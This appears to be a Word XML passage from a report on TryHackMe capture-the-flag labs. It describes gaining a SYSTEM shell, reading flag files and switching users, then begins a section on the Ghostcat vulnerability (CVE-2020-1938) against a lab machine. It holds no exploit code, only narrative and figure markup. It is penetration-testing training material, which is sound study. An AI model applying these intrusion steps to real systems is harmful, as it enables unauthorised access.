      <w:r w:rsidR="00823976">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15F3E9E9" wp14:editId="04CEE6CE">
            <wp:extent cx="5347335" cy="2765917"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="760259164" name="Picture 76025916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64" name="Picture 760259164" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId108">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2414" t="3968" r="3823"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5351526" cy="2768085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="040DE1D2" w14:textId="29D1D262" w:rsidR="00EC08D3" w:rsidRDefault="00EC08D3" w:rsidP="00EC08D3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="378" w:name="_Toc111363654"/>
      <w:bookmarkStart w:id="379" w:name="_Toc111363791"/>
      <w:bookmarkStart w:id="380" w:name="_Toc111981816"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>91</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: User information on target machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="378"/>
      <w:bookmarkEnd w:id="379"/>
      <w:bookmarkEnd w:id="380"/>
    </w:p>
    <w:p w14:paraId="63F9B568" w14:textId="77777777" w:rsidR="00EC08D3" w:rsidRPr="00EC08D3" w:rsidRDefault="00EC08D3" w:rsidP="00EC08D3"/>
    <w:p w14:paraId="5FAEFEF2" w14:textId="2E6DB77F" w:rsidR="00EC08D3" w:rsidRDefault="00EC08D3" w:rsidP="00142014">
      <w:r>
        <w:t>A shell</w:t>
      </w:r>
      <w:r w:rsidR="00142014">
        <w:t xml:space="preserve"> wa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s created and the ‘whoami’ command </w:t>
      </w:r>
      <w:r w:rsidR="00142014">
        <w:t>wa</w:t>
      </w:r>
      <w:r>
        <w:t>s used to find the system (nt authority system) as set out in figure</w:t>
      </w:r>
      <w:r w:rsidR="00723DF3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006606E5">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5777785B" w14:textId="77777777" w:rsidR="00EC08D3" w:rsidRDefault="00EC08D3" w:rsidP="00EC08D3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="207E1E22" wp14:editId="2156C0BD">
            <wp:extent cx="4658319" cy="1684020"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="760259162" name="Picture 76025916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62" name="Picture 760259162" descr="Graphical user interface, text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId109">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2464" t="10318" b="6243"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4674009" cy="1689692"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D513139" w14:textId="6FD84491" w:rsidR="00EC08D3" w:rsidRDefault="00EC08D3" w:rsidP="00EC08D3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="381" w:name="_Toc111363655"/>
      <w:bookmarkStart w:id="382" w:name="_Toc111363792"/>
      <w:bookmarkStart w:id="383" w:name="_Toc111981817"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>92</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Shell and ‘whoami’</w:t>
      </w:r>
      <w:bookmarkEnd w:id="381"/>
      <w:bookmarkEnd w:id="382"/>
      <w:bookmarkEnd w:id="383"/>
    </w:p>
    <w:p w14:paraId="787832FC" w14:textId="77777777" w:rsidR="00B83046" w:rsidRDefault="00B83046" w:rsidP="00142014"/>
    <w:p w14:paraId="23E77D89" w14:textId="2F38CB50" w:rsidR="00A17D2F" w:rsidRDefault="00A17D2F" w:rsidP="00142014">
      <w:r>
        <w:t xml:space="preserve">Directories were examined, starting with user ‘Tony’ as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="006606E5">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5E5C99" w14:textId="0CB28BF2" w:rsidR="00A17D2F" w:rsidRDefault="00B83046" w:rsidP="00A17D2F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251752448" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38AF8BAC" wp14:editId="767EA4AD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>563880</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4217269</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1448802" cy="502319"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="760259154" name="Rectangle 760259154"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1448802" cy="502319"/>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9995EB" id="Rectangle 760259154" o:spid="_x0000_s1026" style="position:absolute;margin-left:44.4pt;margin-top:332.05pt;width:114.1pt;height:39.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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251743232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="400CE625" wp14:editId="68962D66">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3850105</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3093185</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="874295" cy="1195137"/>
                <wp:effectExtent l="19050" t="19050" r="21590" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="760259137" name="Rectangle 760259137"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="874295" cy="1195137"/>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2F1D9B" id="Rectangle 760259137" o:spid="_x0000_s1026" style="position:absolute;margin-left:303.15pt;margin-top:243.55pt;width:68.85pt;height:94.1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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A17D2F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A538396" wp14:editId="1DE3132B">
            <wp:extent cx="5151120" cy="5758563"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="760259167" name="Picture 760259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110">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1343" r="3732"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5152529" cy="5760138"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DB6D38" w14:textId="0CE4D996" w:rsidR="00A17D2F" w:rsidRDefault="00A17D2F" w:rsidP="00A17D2F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="384" w:name="_Toc111363656"/>
      <w:bookmarkStart w:id="385" w:name="_Toc111363793"/>
      <w:bookmarkStart w:id="386" w:name="_Toc111981818"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>93</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Examination of Directory Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="384"/>
      <w:bookmarkEnd w:id="385"/>
      <w:bookmarkEnd w:id="386"/>
    </w:p>
    <w:p w14:paraId="5CD92391" w14:textId="77777777" w:rsidR="00142014" w:rsidRDefault="00142014" w:rsidP="00A17D2F">
      <w:pPr>
        <w:ind w:left="851"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A73267" w14:textId="15C39AE2" w:rsidR="00A17D2F" w:rsidRDefault="00362972" w:rsidP="00142014">
      <w:r>
        <w:t xml:space="preserve">The ‘Documents’ directory </w:t>
      </w:r>
      <w:r w:rsidR="00A17D2F">
        <w:t xml:space="preserve">of user ‘Tony’ were examined </w:t>
      </w:r>
      <w:r>
        <w:t>and when the file ‘Flag1’ was found it</w:t>
      </w:r>
      <w:r w:rsidR="00A17D2F">
        <w:t xml:space="preserve"> was opened using the ‘cat’ </w:t>
      </w:r>
      <w:r w:rsidR="000930A0" w:rsidRPr="000930A0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="000930A0" w:rsidRPr="000930A0">
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">concatenate) </w:t>
      </w:r>
      <w:r w:rsidR="00A17D2F">
        <w:t xml:space="preserve">command and the text can </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">be seen in figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E3D6ED" w14:textId="432D1E60" w:rsidR="00A17D2F" w:rsidRDefault="00362972" w:rsidP="00362972">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="851"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00362972">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52FEB7D0" wp14:editId="578ABCB9">
            <wp:extent cx="4880721" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="760259170" name="Picture 760259170"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70" name="Picture 760259170" descr="A picture containing calendar&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4882832" cy="2363222"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F31873" w14:textId="6668B560" w:rsidR="00362972" w:rsidRDefault="00362972" w:rsidP="00362972">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="387" w:name="_Toc111363657"/>
      <w:bookmarkStart w:id="388" w:name="_Toc111363794"/>
      <w:bookmarkStart w:id="389" w:name="_Toc111981819"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>94</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Flag 1 captured</w:t>
      </w:r>
      <w:bookmarkEnd w:id="387"/>
      <w:bookmarkEnd w:id="388"/>
      <w:bookmarkEnd w:id="389"/>
    </w:p>
    <w:p w14:paraId="7FA1EAB6" w14:textId="77777777" w:rsidR="00362972" w:rsidRPr="00362972" w:rsidRDefault="00362972" w:rsidP="00362972"/>
    <w:p w14:paraId="0E7F8339" w14:textId="4A832ECF" w:rsidR="00362972" w:rsidRDefault="00F5457B" w:rsidP="00142014">
      <w:r>
        <w:t>The user was changed to ‘Hazel’</w:t>
      </w:r>
      <w:r w:rsidR="00E32E30">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag 2 </w:t>
      </w:r>
      <w:r w:rsidR="00E32E30">
        <w:t xml:space="preserve">was found and ‘cat’ was used to see the contents </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64066F6E" w14:textId="7F7249A8" w:rsidR="00D07277" w:rsidRDefault="00E32E30" w:rsidP="00E32E30">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251734016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13B1849E" wp14:editId="2CACE24C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>598170</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1635125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1169670" cy="213360"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="760259174" name="Rectangle 760259174"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1169670" cy="213360"/>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B911BE7" id="Rectangle 760259174" o:spid="_x0000_s1026" style="position:absolute;margin-left:47.1pt;margin-top:128.75pt;width:92.1pt;height:16.8pt;z-index:251734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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F5457B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="196DFE7A" wp14:editId="36E6CEE9">
            <wp:extent cx="4548934" cy="1912620"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="760259173" name="Picture 76025917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73" name="Picture 760259173" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId112">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1486" t="72145" r="20059"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4552428" cy="1914089"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A7BCC1" w14:textId="58E64D26" w:rsidR="001F4591" w:rsidRDefault="00E32E30" w:rsidP="00B03EDB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="390" w:name="_Toc111363658"/>
      <w:bookmarkStart w:id="391" w:name="_Toc111363795"/>
      <w:bookmarkStart w:id="392" w:name="_Toc111981820"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>95</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Capture of Flag 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="390"/>
      <w:bookmarkEnd w:id="391"/>
      <w:bookmarkEnd w:id="392"/>
    </w:p>
    <w:p w14:paraId="7666A600" w14:textId="77777777" w:rsidR="006606E5" w:rsidRDefault="006606E5" w:rsidP="001F4591"/>
    <w:p w14:paraId="17DD21A3" w14:textId="19601D9F" w:rsidR="001F4591" w:rsidRDefault="001F4591" w:rsidP="001F4591"/>
    <w:p w14:paraId="175D0C9B" w14:textId="67B95C1A" w:rsidR="001F4591" w:rsidRDefault="001F4591" w:rsidP="001F4591"/>
    <w:p w14:paraId="4D0F4612" w14:textId="5E0002FE" w:rsidR="001F4591" w:rsidRDefault="001F4591" w:rsidP="001F4591"/>
    <w:p w14:paraId="417FBE0A" w14:textId="5CAA5175" w:rsidR="001F4591" w:rsidRDefault="001F4591" w:rsidP="001F4591"/>
    <w:p w14:paraId="0D03EED1" w14:textId="190417AF" w:rsidR="001F4591" w:rsidRDefault="001F4591" w:rsidP="001F4591"/>
    <w:p w14:paraId="4D0D4B6C" w14:textId="77777777" w:rsidR="00203432" w:rsidRDefault="00203432" w:rsidP="001F4591"/>
    <w:p w14:paraId="7B391E22" w14:textId="6B56B920" w:rsidR="00AB416D" w:rsidRDefault="001F4591" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="393" w:name="_Toc113190757"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00103ABA">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007434F5">
        <w:t>Ghostcat: CVE 2020-1938</w:t>
      </w:r>
      <w:r w:rsidR="00137D69">
        <w:t xml:space="preserve"> – Severity Level 9.8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="393"/>
    </w:p>
    <w:p w14:paraId="36751403" w14:textId="270AE975" w:rsidR="005B7BE0" w:rsidRDefault="005B7BE0" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A virtual machine was deployed in TryHackMe as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00DF1C41">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00555252">
        <w:t>This has an IP address of 10.10.249.194 and the two flags are to compromise the machine</w:t>
      </w:r>
      <w:r w:rsidR="00723DF3">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00555252">
        <w:t xml:space="preserve"> obtain user.txt and to escalate privileges and obtain the root.txt files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404A787D" w14:textId="2C483079" w:rsidR="005B7BE0" w:rsidRDefault="00DF1C41" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF1C41">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AA9355C" wp14:editId="51907AE4">
            <wp:extent cx="5360670" cy="3392114"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="18415"/>
            <wp:docPr id="760259257" name="Picture 76025925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57" name="Picture 760259257" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId113"/>
                    <a:srcRect l="2078" t="3337" r="2773"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5385813" cy="3408024"/>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8785E15" w14:textId="3B9F607C" w:rsidR="00DF1C41" w:rsidRDefault="00DF1C41" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="394" w:name="_Toc111363659"/>
      <w:bookmarkStart w:id="395" w:name="_Toc111363796"/>
      <w:bookmarkStart w:id="396" w:name="_Toc111981821"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>96</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Activate Virtual Machine Tomcat</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYTkyYzc4OTgtOGUzOC00YTA2LWI3N2ItYWQxNTBiNDA2YWQz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2092116551"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="394"/>
      <w:bookmarkEnd w:id="395"/>
      <w:bookmarkEnd w:id="396"/>
    </w:p>
    <w:p w14:paraId="33542D44" w14:textId="77777777" w:rsidR="0029310D" w:rsidRPr="0029310D" w:rsidRDefault="0029310D" w:rsidP="0029310D"/>
    <w:p w14:paraId="25170110" w14:textId="7FC4E07F" w:rsidR="0015416F" w:rsidRPr="0015416F" w:rsidRDefault="0015416F" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>A directory called tomghost and a readable file</w:t>
      </w:r>
      <w:r w:rsidRPr="0015416F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is made, </w:t>
      </w:r>
      <w:r w:rsidR="0029310D">
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the IP address is added as a variable as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DA3809" w14:textId="69252D82" w:rsidR="00DF1C41" w:rsidRDefault="0015416F" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0015416F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
